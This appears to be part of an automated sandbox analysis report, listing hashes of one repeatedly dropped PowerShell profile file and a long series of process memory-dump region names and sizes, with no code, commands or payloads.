4af4383cbaee6ae1f0f2000fbdb83356b0696c576d0b858c96edfaf61a588610d7046807c86b44ea0719d4dd1a204523ebc0bbe05fb7ffb1e13fba714095d296

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
45778e8bc00375094713f9368f5ad8c6

SHA1
44231166d84a098e842a5a5fe5a72706025abe7c

SHA256
43ab9e9a5dfaf8f013d9e480a9e26f373770f380182fc286253f3cbd376cb20f

SHA512
38690014491db5f0ed892dfe8fea3f98c5451480dd7af9ead722820b21081e15c73a8e01f42e6ac5bda857de0e698376dd06f4e9f3aedfcaabc39cd1b62b7ea7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
45778e8bc00375094713f9368f5ad8c6

SHA1
44231166d84a098e842a5a5fe5a72706025abe7c

SHA256
43ab9e9a5dfaf8f013d9e480a9e26f373770f380182fc286253f3cbd376cb20f

SHA512
38690014491db5f0ed892dfe8fea3f98c5451480dd7af9ead722820b21081e15c73a8e01f42e6ac5bda857de0e698376dd06f4e9f3aedfcaabc39cd1b62b7ea7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
45778e8bc00375094713f9368f5ad8c6

SHA1
44231166d84a098e842a5a5fe5a72706025abe7c

SHA256
43ab9e9a5dfaf8f013d9e480a9e26f373770f380182fc286253f3cbd376cb20f

SHA512
38690014491db5f0ed892dfe8fea3f98c5451480dd7af9ead722820b21081e15c73a8e01f42e6ac5bda857de0e698376dd06f4e9f3aedfcaabc39cd1b62b7ea7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
45778e8bc00375094713f9368f5ad8c6

SHA1
44231166d84a098e842a5a5fe5a72706025abe7c

SHA256
43ab9e9a5dfaf8f013d9e480a9e26f373770f380182fc286253f3cbd376cb20f

SHA512
38690014491db5f0ed892dfe8fea3f98c5451480dd7af9ead722820b21081e15c73a8e01f42e6ac5bda857de0e698376dd06f4e9f3aedfcaabc39cd1b62b7ea7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
514d03c62d77cc510a1a3e8d5929ea8c

SHA1
f79067e9b9cabfd3090cf6fa4639ca415f8c292f

SHA256
d0d18b86c197caf6747a1a23e20daf9d6ff4626e08566e8a0f4105a7b78bfb84

SHA512
51720d7545d26139750383a285561e43d2cbf527722e856e8348beed21348213aa05c63a50a745c23cf9a9fc62dd70f4c9e42a6861d792871cfb4fc0d8a4feac

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f4912cd27f85cc109ddabd6e6c35d0a5

SHA1
fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c

SHA256
72255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee

SHA512
1c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
45778e8bc00375094713f9368f5ad8c6

SHA1
44231166d84a098e842a5a5fe5a72706025abe7c

SHA256
43ab9e9a5dfaf8f013d9e480a9e26f373770f380182fc286253f3cbd376cb20f

SHA512
38690014491db5f0ed892dfe8fea3f98c5451480dd7af9ead722820b21081e15c73a8e01f42e6ac5bda857de0e698376dd06f4e9f3aedfcaabc39cd1b62b7ea7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f4912cd27f85cc109ddabd6e6c35d0a5

SHA1
fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c

SHA256
72255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee

SHA512
1c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f4912cd27f85cc109ddabd6e6c35d0a5

SHA1
fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c

SHA256
72255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee

SHA512
1c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
45778e8bc00375094713f9368f5ad8c6

SHA1
44231166d84a098e842a5a5fe5a72706025abe7c

SHA256
43ab9e9a5dfaf8f013d9e480a9e26f373770f380182fc286253f3cbd376cb20f

SHA512
38690014491db5f0ed892dfe8fea3f98c5451480dd7af9ead722820b21081e15c73a8e01f42e6ac5bda857de0e698376dd06f4e9f3aedfcaabc39cd1b62b7ea7

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
19312bb5b1f71df0d473529b425e2a03

SHA1
f65187c371211433363bdb0967914c91f7e73180

SHA256
7cc7c508c4f19dc5af1a19242777fc711bb7ab857f7bede4c16fa7e3f901e81c

SHA512
65323fe9b0c1474299a0dbe40975ca4f6b26a7230e937c0b6d3bea0f1fabb0877621075d0627ebcadf10e80dacafb5dd109a9b4b246e216f083c7a44a279b5d5

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
91ff85101962bbed6e82a25f69d0870d

SHA1
5999714f423427c98f32a3bce88a7d2adf103b86

SHA256
e167dedaca48e5a6c7bc5ef5549982c466362a181796d946caa9195c6b893fec

SHA512
3f625700bade5a52ba55862b6c323cd0cda8d6b70e7f081a0b2fb73913ce7ad16429d147f9f4af76ab21fa5e5e6b30d83534abd681571e3ca0e01750f8bd32cf

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
91ff85101962bbed6e82a25f69d0870d

SHA1
5999714f423427c98f32a3bce88a7d2adf103b86

SHA256
e167dedaca48e5a6c7bc5ef5549982c466362a181796d946caa9195c6b893fec

SHA512
3f625700bade5a52ba55862b6c323cd0cda8d6b70e7f081a0b2fb73913ce7ad16429d147f9f4af76ab21fa5e5e6b30d83534abd681571e3ca0e01750f8bd32cf

Download Submit
memory/764-284-0x0000000000000000-mapping.dmp

Download
memory/764-301-0x0000000000000000-mapping.dmp

Download
memory/1264-234-0x0000000000000000-mapping.dmp

Download
memory/1264-289-0x0000000000000000-mapping.dmp

Download
memory/1424-138-0x0000016450D63000-0x0000016450D65000-memory.dmp

Filesize
8KB

Download
memory/1424-133-0x0000016469590000-0x0000016469591000-memory.dmp

Filesize
4KB

Download
memory/1424-118-0x0000000000000000-mapping.dmp

Download
memory/1424-137-0x0000016450D60000-0x0000016450D62000-memory.dmp

Filesize
8KB

Download
memory/1424-172-0x0000016450D66000-0x0000016450D68000-memory.dmp

Filesize
8KB

Download
memory/1584-230-0x0000000000000000-mapping.dmp

Download
memory/1596-263-0x0000000000000000-mapping.dmp

Download
memory/1616-271-0x0000000000000000-mapping.dmp

Download
memory/2420-258-0x0000000000000000-mapping.dmp

Download
memory/2420-298-0x0000000000000000-mapping.dmp

Download
memory/2500-302-0x0000000000000000-mapping.dmp

Download
memory/2584-292-0x0000000000000000-mapping.dmp

Download
memory/2604-256-0x0000000000000000-mapping.dmp

Download
memory/2616-187-0x0000000000000000-mapping.dmp

Download
memory/2616-269-0x000001EC5B8E8000-0x000001EC5B8E9000-memory.dmp

Filesize
4KB

Download
memory/2616-196-0x000001EC5B8E0000-0x000001EC5B8E2000-memory.dmp

Filesize
8KB

Download
memory/2616-237-0x000001EC5B8E6000-0x000001EC5B8E8000-memory.dmp

Filesize
8KB

Download
memory/2616-197-0x000001EC5B8E3000-0x000001EC5B8E5000-memory.dmp

Filesize
8KB

Download
memory/2620-249-0x0000000000000000-mapping.dmp

Download
memory/2628-201-0x00000270B77F3000-0x00000270B77F5000-memory.dmp

Filesize
8KB

Download
memory/2628-261-0x00000270B77F8000-0x00000270B77F9000-memory.dmp

Filesize
4KB

Download
memory/2628-200-0x00000270B77F0000-0x00000270B77F2000-memory.dmp

Filesize
8KB

Download
memory/2628-221-0x00000270B77F6000-0x00000270B77F8000-memory.dmp

Filesize
8KB

Download
memory/2628-191-0x0000000000000000-mapping.dmp

Download
memory/2648-220-0x0000027C6AE70000-0x0000027C6AE72000-memory.dmp

Filesize
8KB

Download
memory/2648-280-0x0000027C6AE78000-0x0000027C6AE79000-memory.dmp

Filesize
4KB

Download
memory/2648-224-0x0000027C6AE73000-0x0000027C6AE75000-memory.dmp

Filesize
8KB

Download
memory/2648-250-0x0000027C6AE76000-0x0000027C6AE78000-memory.dmp

Filesize
8KB

Download
memory/2648-202-0x0000000000000000-mapping.dmp

Download
memory/2660-285-0x0000000000000000-mapping.dmp

Download
memory/2848-247-0x0000000000000000-mapping.dmp

Download
memory/2928-215-0x00000165CAF30000-0x00000165CAF32000-memory.dmp

Filesize
8KB

Download
memory/2928-246-0x00000165CAF36000-0x00000165CAF38000-memory.dmp

Filesize
8KB

Download
memory/2928-277-0x00000165CAF38000-0x00000165CAF39000-memory.dmp

Filesize
4KB

Download
memory/2928-216-0x00000165CAF33000-0x00000165CAF35000-memory.dmp

Filesize
8KB

Download
memory/2928-199-0x0000000000000000-mapping.dmp

Download
memory/2996-127-0x000002D338090000-0x000002D338091000-memory.dmp

Filesize
4KB

Download
memory/2996-117-0x0000000000000000-mapping.dmp

Download
memory/2996-176-0x000002D338166000-0x000002D338168000-memory.dmp

Filesize
8KB

Download
memory/2996-193-0x000002D338168000-0x000002D338169000-memory.dmp

Filesize
4KB

Download
memory/2996-135-0x000002D338160000-0x000002D338162000-memory.dmp

Filesize
8KB

Download
memory/2996-136-0x000002D338163000-0x000002D338165000-memory.dmp

Filesize
8KB

Download
memory/3012-210-0x000002433FCA3000-0x000002433FCA5000-memory.dmp

Filesize
8KB

Download
memory/3012-192-0x0000000000000000-mapping.dmp

Download
memory/3012-274-0x000002433FCA8000-0x000002433FCA9000-memory.dmp

Filesize
4KB

Download
memory/3012-238-0x000002433FCA6000-0x000002433FCA8000-memory.dmp

Filesize
8KB

Download
memory/3012-209-0x000002433FCA0000-0x000002433FCA2000-memory.dmp

Filesize
8KB

Download
memory/3312-294-0x0000000000000000-mapping.dmp

Download
memory/3364-259-0x0000000000000000-mapping.dmp

Download
memory/3368-116-0x0000000001140000-0x0000000001142000-memory.dmp

Filesize
8KB

Download
memory/3368-114-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/3524-291-0x0000000000000000-mapping.dmp

Download
memory/3576-233-0x0000000000000000-mapping.dmp

Download
memory/3940-190-0x0000000000000000-mapping.dmp

Download
memory/3940-198-0x00000178F1FE3000-0x00000178F1FE5000-memory.dmp

Filesize
8KB

Download
memory/3940-236-0x00000178F1FE6000-0x00000178F1FE8000-memory.dmp

Filesize
8KB

Download
memory/3940-268-0x00000178F1FE8000-0x00000178F1FE9000-memory.dmp

Filesize
4KB

Download
memory/3940-194-0x00000178F1FE0000-0x00000178F1FE2000-memory.dmp

Filesize
8KB

Download
memory/3996-214-0x000001CB90383000-0x000001CB90385000-memory.dmp

Filesize
8KB

Download
memory/3996-195-0x0000000000000000-mapping.dmp

Download
memory/3996-211-0x000001CB90380000-0x000001CB90382000-memory.dmp

Filesize
8KB

Download
memory/3996-244-0x000001CB90386000-0x000001CB90388000-memory.dmp

Filesize
8KB

Download
memory/3996-275-0x000001CB90388000-0x000001CB90389000-memory.dmp

Filesize
4KB

Download
memory/4020-300-0x0000000000000000-mapping.dmp

Download
memory/4104-225-0x0000021D9A190000-0x0000021D9A192000-memory.dmp

Filesize
8KB

Download
memory/4104-203-0x0000000000000000-mapping.dmp

Download
memory/4104-276-0x0000021D9A198000-0x0000021D9A199000-memory.dmp

Filesize
4KB

Download
memory/4104-226-0x0000021D9A193000-0x0000021D9A195000-memory.dmp

Filesize
8KB

Download
memory/4104-245-0x0000021D9A196000-0x0000021D9A198000-memory.dmp

Filesize
8KB

Download
memory/4112-239-0x0000000000000000-mapping.dmp

Download
memory/4148-281-0x0000000000000000-mapping.dmp

Download
memory/4156-320-0x0000024C6E6A0000-0x0000024C6E6A2000-memory.dmp

Filesize
8KB

Download
memory/4156-322-0x0000024C6E6A3000-0x0000024C6E6A5000-memory.dmp

Filesize
8KB

Download
memory/4192-240-0x0000000000000000-mapping.dmp

Download
memory/4228-228-0x000001937F7F3000-0x000001937F7F5000-memory.dmp

Filesize
8KB

Download
memory/4228-227-0x000001937F7F0000-0x000001937F7F2000-memory.dmp

Filesize
8KB

Download
memory/4228-278-0x000001937F7F8000-0x000001937F7F9000-memory.dmp

Filesize
4KB

Download
memory/4228-251-0x000001937F7F6000-0x000001937F7F8000-memory.dmp

Filesize
8KB

Download
memory/4228-205-0x0000000000000000-mapping.dmp

Download
memory/4240-321-0x0000017D672B0000-0x0000017D672B2000-memory.dmp

Filesize
8KB

Download
memory/4240-323-0x0000017D672B3000-0x0000017D672B5000-memory.dmp

Filesize
8KB

Download
memory/4252-297-0x0000000000000000-mapping.dmp

Download
memory/4280-231-0x0000000000000000-mapping.dmp

Download
memory/4304-217-0x00000281DD0A3000-0x00000281DD0A5000-memory.dmp

Filesize
8KB

Download
memory/4304-206-0x0000000000000000-mapping.dmp

Download
memory/4304-212-0x00000281DD0A0000-0x00000281DD0A2000-memory.dmp

Filesize
8KB

Download
memory/4304-253-0x00000281DD0A6000-0x00000281DD0A8000-memory.dmp

Filesize
8KB

Download
memory/4304-279-0x00000281DD0A8000-0x00000281DD0A9000-memory.dmp

Filesize
4KB

Download
memory/4312-267-0x0000000000000000-mapping.dmp

Download
memory/4396-288-0x000001ACA4428000-0x000001ACA4429000-memory.dmp

Filesize
4KB

Download
memory/4396-219-0x000001ACA4423000-0x000001ACA4425000-memory.dmp

Filesize
8KB

Download
memory/4396-218-0x000001ACA4420000-0x000001ACA4422000-memory.dmp

Filesize
8KB

Download
memory/4396-207-0x0000000000000000-mapping.dmp

Download
memory/4396-254-0x000001ACA4426000-0x000001ACA4428000-memory.dmp

Filesize
8KB

Download
memory/4404-305-0x0000000000000000-mapping.dmp

Download
memory/4412-264-0x0000000000000000-mapping.dmp

Download
memory/4452-257-0x0000000000000000-mapping.dmp

Download
memory/4520-252-0x000001DCA9ED6000-0x000001DCA9ED8000-memory.dmp

Filesize
8KB

Download
memory/4520-223-0x000001DCA9ED3000-0x000001DCA9ED5000-memory.dmp

Filesize
8KB

Download
memory/4520-208-0x0000000000000000-mapping.dmp

Download
memory/4520-222-0x000001DCA9ED0000-0x000001DCA9ED2000-memory.dmp

Filesize
8KB

Download
memory/4520-287-0x000001DCA9ED8000-0x000001DCA9ED9000-memory.dmp

Filesize
4KB

Download
memory/4544-262-0x0000000000000000-mapping.dmp

Download
memory/4552-255-0x0000000000000000-mapping.dmp

Download
memory/4568-241-0x0000000000000000-mapping.dmp

Download
memory/4592-283-0x0000000000000000-mapping.dmp

Download
memory/4604-312-0x000002701C283000-0x000002701C285000-memory.dmp

Filesize
8KB

Download
memory/4604-311-0x000002701C280000-0x000002701C282000-memory.dmp

Filesize
8KB

Download
memory/4604-313-0x000002701C286000-0x000002701C288000-memory.dmp

Filesize
8KB

Download
memory/4624-319-0x000000001B300000-0x000000001B302000-memory.dmp

Filesize
8KB

Download
memory/4632-296-0x0000000000000000-mapping.dmp

Download
memory/4632-213-0x0000000000000000-mapping.dmp

Download
memory/4668-299-0x0000000000000000-mapping.dmp

Download
memory/4732-248-0x0000000000000000-mapping.dmp

Download
memory/4736-232-0x0000000000000000-mapping.dmp

Download
memory/4780-290-0x0000000000000000-mapping.dmp

Download
memory/4860-242-0x0000000000000000-mapping.dmp

Download
memory/4868-243-0x0000000000000000-mapping.dmp

Download
memory/4872-235-0x0000000000000000-mapping.dmp

Download
memory/4908-272-0x0000000000000000-mapping.dmp

Download
memory/4964-286-0x0000000000000000-mapping.dmp

Download
memory/4988-270-0x0000000000000000-mapping.dmp

Download
memory/4992-265-0x0000000000000000-mapping.dmp

Download
memory/5020-229-0x0000000000000000-mapping.dmp

Download
memory/5036-293-0x0000000000000000-mapping.dmp

Download
memory/5052-295-0x0000000000000000-mapping.dmp

Download
memory/5052-260-0x0000000000000000-mapping.dmp

Download